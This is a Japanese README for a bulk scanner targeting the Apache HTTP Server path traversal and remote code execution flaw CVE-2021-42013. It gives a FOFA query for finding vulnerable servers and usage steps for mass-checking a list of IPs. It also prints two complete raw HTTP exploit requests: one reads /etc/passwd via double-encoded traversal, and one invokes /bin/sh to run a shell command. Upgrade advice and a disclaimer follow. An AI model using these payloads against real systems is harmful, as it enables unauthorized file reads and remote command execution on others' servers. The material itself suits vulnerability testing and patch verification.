
Apache リモートコード実行 (CVE-2021-42013) バルク検出ツール:Apache HTTP Server は、米国アパッチ財団が開発するオープンソースのウェブサーバーです。高速で信頼性が高く、シンプルなAPIで拡張可能な特徴を持ちます。CVE-2021-41773 に対する修正が Apache HTTP Server 2.4.50 では不十分であることが判明しました。攻撃者はパストラバーサル攻撃を使用して、エイリアス的ディレクティブで設定されたディレクトリ外のファイルにURLをマッピングできます。これらのディレクトリ外のファイルが通常のデフォルト設定「Require all denied」で保護されていない場合、リクエストが成功する可能性があります。さらに、これらのエイリアスパスでCGIスクリプトが有効になっている場合、リモートコード実行が可能になります。この問題は Apache 2.4.49 および Apache 2.4.50 にのみ影響し、それ以前のバージョンには影響しません。
Apache リモートコード実行 (CVE-2021-42013)
Apache HTTP Server は、米国アパッチ(Apache)財団のオープンソースウェブサーバーです。このサーバーは高速で信頼性が高く、簡単なAPIで拡張できる特徴があります。Apache HTTP Server 2.4.50 において、CVE-2021-41773 に対する修正が不十分であることが判明しました。攻撃者はパストラバーサル攻撃を使用して、URL をエイリアスディレクティブで設定されたディレクトリ外のファイルにマッピングする可能性があります。これらのディレクトリ外のファイルが通常のデフォルト設定「すべて拒否」で保護されていない場合、これらのリクエストは成功する可能性があります。また、これらのエイリアスパスで CGI スクリプトが有効になっている場合、リモートコード実行が可能になる可能性があります。この問題は Apache 2.4.49 および Apache 2.4.50 にのみ影響し、それ以前のバージョンには影響しません。
Apache HTTP Server 2.4.49
Apache HTTP Server 2.4.50
server="Apache/2.4.49" || server="Apache/2.4.50"
1. 検出対象のIPアドレスをip.txtファイルに記入します
2. python3 check.py を実行します
GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
Content-Length: 57
echo Content-Type: text/plain; echo;ls /

現在これらの脆弱性は修正されています。脆弱性の深刻さを考慮し、影響を受けるユーザーは直ちに Apache HTTP Server 2.4.51(10月7日リリース)またはそれ以降のバージョンにアップグレードすることを推奨します。
ダウンロードリンク:
https://httpd.apache.org/download.cgi#apache24
本ツールは、セキュリティテスト担当者が自己テストを行うためにのみ提供されています。ユーザーが悪用した場合の一切の結果は作者の責任ではありません。使用者は現地の法律を必ず遵守してください。本プログラムは商用目的での使用はできず、学習・交流のみに限定されます。
